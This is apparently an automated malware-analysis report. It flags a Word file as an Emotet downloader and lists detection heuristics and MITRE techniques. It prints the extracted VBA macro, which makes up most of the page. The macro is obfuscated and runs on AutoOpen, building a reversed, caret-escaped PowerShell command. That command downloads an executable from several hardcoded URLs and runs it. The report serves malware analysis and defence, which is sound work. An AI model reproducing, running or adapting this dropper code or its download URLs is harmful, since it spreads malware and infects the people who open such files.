MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6787868-0', indicating a known downloader. The presence of a VBA macro with an AutoOpen function, which is a common technique for Emotet, further supports this classification. The script attempts to construct and execute a command, likely to download and run a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6787868-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6787868-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4330 bytes |
SHA-256: b3630eb3324ce0ec00cae2680b59d19c351eea8dfddbceab6e100eeef3597a22 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jisMDRw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jujpOz()
ReDim jujpOz(4)
jujpOz(0) = 506070408
jujpOz(1) = 324
jujpOz(2) = 441
jujpOz(3) = 6
Dim CczCM()
ReDim CczCM(4)
CczCM(0) = 781
CczCM(1) = 9
CczCM(2) = 9150
CczCM(3) = 9
Dim qjzcp()
ReDim qjzcp(3)
qjzcp(0) = 469
qjzcp(1) = 776
qjzcp(2) = 74
Dim HoQjJA()
ReDim HoQjJA(4)
HoQjJA(0) = 1277
HoQjJA(1) = 89
HoQjJA(2) = 8403
HoQjJA(3) = 45
Dim SKwOn()
ReDim SKwOn(3)
SKwOn(0) = 447267940
SKwOn(1) = 154510115
SKwOn(2) = 123
Dim QiSWYD()
ReDim QiSWYD(2)
QiSWYD(0) = 7606
QiSWYD(1) = 33
Shell@ IJRCocJpHiG + ZSalkIYl + QKwcbvlm, Format(0)
Dim SNHvH()
ReDim SNHvH(5)
SNHvH(0) = 5
SNHvH(1) = 216725380
SNHvH(2) = 28
SNHvH(3) = 4292
SNHvH(4) = 34
Dim ikzjZ()
ReDim ikzjZ(2)
ikzjZ(0) = 4056
ikzjZ(1) = 49753595
Dim zDUZR()
ReDim zDUZR(3)
zDUZR(0) = 336113972
zDUZR(1) = 529
zDUZR(2) = 975
Dim zFdCv()
ReDim zFdCv(3)
zFdCv(0) = 7
zFdCv(1) = 381
zFdCv(2) = 2857
End Sub
Attribute VB_Name = "IDrCGYOVw"
Function IJRCocJpHiG()
On _
Error _
Resume _
Next
Dim Qcvzz()
ReDim Qcvzz(2)
Qcvzz(0) = 40
Qcvzz(1) = 4827
Dim mPCBMC()
ReDim mPCBMC(3)
mPCBMC(0) = 51599234
mPCBMC(1) = 2635
mPCBMC(2) = 207
YQvqa = Format(Chr(10 + 16 + 11 + 5 + 57)) + "md /V^:/" + Format(Chr(7 + 11 + 8 + 3 + 38)) + Format(Chr(3 + 5 + 3 + 1 + 22)) + "^s^e^t" + " ^XK^d=^ ^ ^ ^ ^ " + "^ ^ ^ " + " ^ ^ ^ }^}{h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^t^a" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "}^;^" + "k^aerb;^F^zv^" + "$ m^e^t^I^" + "-^ek^ovn^I^;)" + "Fzv$^ ,S^BV$(eliFd^a^o^ln" + "w^o^D.^wV^B${^yr^t^{" + ")YRn^$ ni^ SBV^" + "$(^h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ero^f;^'^ex^e^.^'+^z^S" + "r^$^+^'"
Dim ICjTl()
ReDim ICjTl(4)
ICjTl(0) = 242176595
ICjTl(1) = 8309
ICjTl(2) = 486
ICjTl(3) = 91
Dim KjuCz()
ReDim KjuCz(2)
KjuCz(0) = 2230
KjuCz(1) = 927
Dim pBVEZ()
ReDim pBVEZ(4)
pBVEZ(0) = 3417
pBVEZ(1) = 1
pBVEZ(2) = 4
pBVEZ(3) = 12
iSAlzkwSbWo = "\'^+" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "il^bup:vn^e$=" + "Fzv^$^;'^7^9^7'" + "^ ^= ^z^Sr^$;)^'^@'(^til^pS." + "'n7^9^0^8^L/^m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.atin" + "^aw^gn" + "a^tn^e^t^l" + "^ek^i^tr^a//:ptt^h@P^Dky^3/^d" + "i.^be^w^.urab^le^kitr^ab^ew//" + "^:p^t^th^@^x^xYH" + "^sf/m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^." + Format(Chr(10 + 16 + 11 + 5 + 57)) + "megka//^:^p" + "^t^th^@^i^gXm^F^8z2/mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.l^l^i"
Dim ZHsZF()
ReDim ZHsZF(4)
ZHsZF(0) = 344686345
ZHsZF(1) = 91519779
ZHsZF(2) = 4715
ZHsZF(3) = 6
Dim ToiVKX()
ReDim ToiVKX(5)
ToiVKX(0) = 1485
ToiVKX(1) = 2913
ToiVKX(2) = 30
ToiVKX(3) = 9967
ToiVKX(4) = 5
Dim MOtwY()
ReDim MOtwY(3)
MOtwY(0) = 22
MOtwY(1) = 1602
MOtwY(2) = 91
Dim mXBPuz()
ReDim mXBPuz(5)
mXBPuz(0) = 3
mXBPuz(1) = 8077
mXBPuz(2) = 4
mXBPuz(3) = 793
mXBPuz(4) = 99
shGpbmnXn = "r^gto^ira^l//:" + "^p^t^t^h^@hpT^Or/^mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + ".^ss^er" + "d^d^a^ev^i^t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^ep" + "s^w^en//^:p^t^th'=^Y" + "Rn$^;tnei^l" + Format(Chr(7 + 11 + 8 + 3 + 38)) + "^be^W.t^eN t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "e^jb" + "^o-^wen=^wVB$^ lle^h^srew" + "^o^p&&^f^or /^L %^T ^in (3^" + "7^6^;-^1^;0)^d^" + "o ^se^t ^Q^S" + "l=!^Q^Sl" + "!!^XK^d:~%" + "^T,1!&&^i^f %^T=^=^0 " + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ll"
Dim cfpJLs()
ReDim cfpJLs(3)
cfpJLs(0) = 29
cfpJLs(1) = 333202737
cfpJLs(2) = 6172
Dim KwhNF()
ReDim KwhNF(4)
KwhNF(0) = 857
KwhNF(1) = 9
KwhNF(2) = 9823
KwhNF(3) = 6439
Dim NjsvJp()
ReDim NjsvJp(3)
NjsvJp(0) = 7
NjsvJp(1) = 2123
NjsvJp(2) = 24
Dim frCGTv()
ReDim frCGTv(3)
frCGTv(0) = 62
frCGTv(1) = 9
frCGTv(2) = 38
pp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.